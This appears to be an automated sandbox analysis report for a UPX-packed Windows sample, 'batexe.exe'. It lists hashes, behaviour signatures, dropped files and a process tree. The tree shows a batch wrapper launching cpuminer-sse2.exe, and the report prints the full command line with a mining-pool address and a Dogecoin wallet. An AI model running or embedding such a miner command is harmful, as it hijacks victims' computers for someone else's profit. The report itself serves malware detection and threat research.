Analysis

  • max time kernel
    296s
  • max time network
    305s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    13-02-2024 17:37

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4456
    • C:\Users\Admin\AppData\Local\Temp\1335.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\1335.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1335.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1930.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4580
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1335.tmp\b2e.exe

    Filesize

    246KB

    MD5

    6cb8ece0295830ba21b842afa90ddd6c

    SHA1

    5c59fd9270cc5b37442c588d07867f33079ed52e

    SHA256

    3de90a1ebe7b0b3a3675a72d72c9b9b55e83cce5a67941611e1e57be1ab88bf8

    SHA512

    880107d69f7eed5612c2b3e0b73868c24be60a86c0452fc50e61e8ff44ccb8afbb43dd8a46e6782c16bcbce4264b2423be043fbf61a0dff1735fbc173b556866

  • C:\Users\Admin\AppData\Local\Temp\1335.tmp\b2e.exe

    Filesize

    2.4MB

    MD5

    2cfa665b5d2739bff714337e49db598c

    SHA1

    4c190120cb9dbeee2edcf139f9d9e4b8e9a29b83

    SHA256

    ed494fdb9b65742dd2294246281668164ba6301abe5911e96cda954420ef6b3f

    SHA512

    42e5eec3087b2523e9530dc0f4705662f2e81267745beb672782c20023fe439d6c5dbc82f705d6ac6f9bf5c1a5d25f44665bfb3700e566734114a5f0da10e66f

  • C:\Users\Admin\AppData\Local\Temp\1930.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    333KB

    MD5

    d4feb2d4429a400dc3fb401a30110934

    SHA1

    7bc70c8d6b0a19c0b5298339bf094600a9e271ff

    SHA256

    60dc75c298f6a5a61dd620f03da400bed1a4f11bab213e11c202ba1ff3b98fcf

    SHA512

    122b6d094250b7c6f7a26a690979a0521500523243c46c6d09f903529cbaaf8e3378299a44678dece547edcc4c1aae7b342862466f3ec110a0e64c5b5fcd287e

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    308KB

    MD5

    34f78791f41f9311d3fc9ef6174ce277

    SHA1

    b05e9636f1b883c2bd113c212c1cc9446ef74206

    SHA256

    1636371ec863a70bf8bc0b9e836ea75b84479df6d8fac5c9cdc84d5dd0395fd8

    SHA512

    21f321d15f3e0e5fa769cc51398e604f2b3238ebee06e4d52a10f9583f3590286eef10426f1c2a0dc392e851b624a4fb447303e8aa99d71397016021bfd0b51f

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    288KB

    MD5

    a60395564d5b7cd3be4ee973332cadd7

    SHA1

    7bf69a00becbdf94fb6658b3278877766db32da1

    SHA256

    fad9a7ee361c053046290dc207121b13986c1cece05d1a093786cf76b7b00697

    SHA512

    001f053d248b715f16ff63686c1c85052d205d093ad93231a7a5492f601eca579176e658ef6ad587848d92aff6869485b9f1900a7077c67d27a6f14811737bcd

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    267KB

    MD5

    314772f15f409b29bb7562aa8b497ab0

    SHA1

    2c53ccc0eade510ad3a1c890635d924141e3cd8e

    SHA256

    5a9e46b6155a4ca7226f1cbe5e6131715c779951ed98fa5accee68ed1f614418

    SHA512

    5b50280fe5dd520404c8f3891e71921ea5f2216e09b2ceedc019d8dc8e9ff314d0d8d5fcaac3562bbaf91bc5cc232888fbac3da9bc51dc12e02517b2054ec603

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    269KB

    MD5

    292260826a1496f7447ddfe40bd356ef

    SHA1

    d77084c120815826b7a44ea56f77c5d1347b4d5d

    SHA256

    a3e2e1c574bff794adfabc3cfaa87f2ead8d9f60fe966f32ad6aad6f73e95cac

    SHA512

    9790ad627904e97332ac56105a36f0b93efe0710f797e204e6dcf06b7aad4aae672a9e0e4ee0f5eb92fdb6584883c0b7f220490296161a54ec62945b5e4ef526

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    197KB

    MD5

    96d3da87e29c98d282348e462e777e32

    SHA1

    8618ea1f9302ed8ea6a34d20b6f8613732d61418

    SHA256

    faf4a1c5710fafeb69fd8da4790486cf512158ee3c9906ddbc33888d4bf197e8

    SHA512

    62b52b98a7d924d86df8b5657a814adcfe6e626a3a312980dd1f98b9d43f10622eb3219eda1fc0c82e4066779c56cf5d710e3fa7470076168a7aad4be106ebc6

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    215KB

    MD5

    ddf8c761f9a8fa838c4793167aa52eaf

    SHA1

    193a8d74d945c66542e6b29dee18971a384757ae

    SHA256

    b38cae95ee2dd371b22b3b46415612948cf493575590f780dd6b66824be21f9f

    SHA512

    c6334089233fb74f8eda18434c37f0e9b176eae770ea66038b109b4dcb4f2c134ff5e74d0519d063abb93177ee34254f9f3bb8d54849c3371a2399e25b7ca1b2

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    215KB

    MD5

    0e6bb77458ccb20ed16a56efb8550911

    SHA1

    8e7d80237dee0cfcd72982e76b863069e5c2ccc4

    SHA256

    e9de7f68ec13a2b8fe0877a36ca171e1895b1864a34fa3a0833b17e97ddb580b

    SHA512

    d0cb9b398b3a6aa5c8bae4456be3fcc29518f3239a0b984345817052185a0d114528365fd72a2ee1fe7a6f8bc3a43c6d0c9502755d746966ad6a2b36f03b1c07

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    221KB

    MD5

    39c67b8fd0dcb4805418ffbe62ee1449

    SHA1

    15357f4afbc793219f96e1a58a3f9d38beb8c1ea

    SHA256

    059fae2fa2343e19786df8c8eb0b94179e5123418f5c4483fa238a506d3eefb7

    SHA512

    6294d5d942fc524793dc2f65ddf88bd69712f218449ed523152ed38bab027d7b8d853062a48007dcd2650e36fa5a86fd067dc2081a338ca8fca31a34f3e492f6

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    245KB

    MD5

    ca1292c5c88926c756d88ef1806e99c3

    SHA1

    6480885adcc4202ae41872e736b7d62ca812b934

    SHA256

    6258afeb3a0bfb722461db18c38db859866660dd20ca2d0a2aa7efa3ffb5bcda

    SHA512

    7cdcb0285296887e9c56937397439cae12d9ddf3817f3befbb867a97f4dac09cb40dea3b3f8de5c9fd41616f33b3a11845d92bba7cd5ed75719dbf5e2105b06e

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    300KB

    MD5

    a617239d638bbb3a0a7e2def598ac577

    SHA1

    dbeec85966d9e05bfc0e55d3e383280f87a95193

    SHA256

    6f0d2a7eead278f98209a6fd6259368b9ad747a41e837c449f209025cac46ec1

    SHA512

    118805a7cb99063f9b5e9f21d92d9158c502502c217e60fc792ac1e4439651f7d7c7eb0aa3d70a64e5e22439c680ca9d9edaeaa20508876d912e9300c54310ee

  • memory/4456-4-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/4652-6-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4652-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4692-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/4692-42-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/4692-43-0x00000000580D0000-0x0000000058168000-memory.dmp

    Filesize

    608KB

  • memory/4692-44-0x0000000001080000-0x0000000002935000-memory.dmp

    Filesize

    24.7MB

  • memory/4692-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4692-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB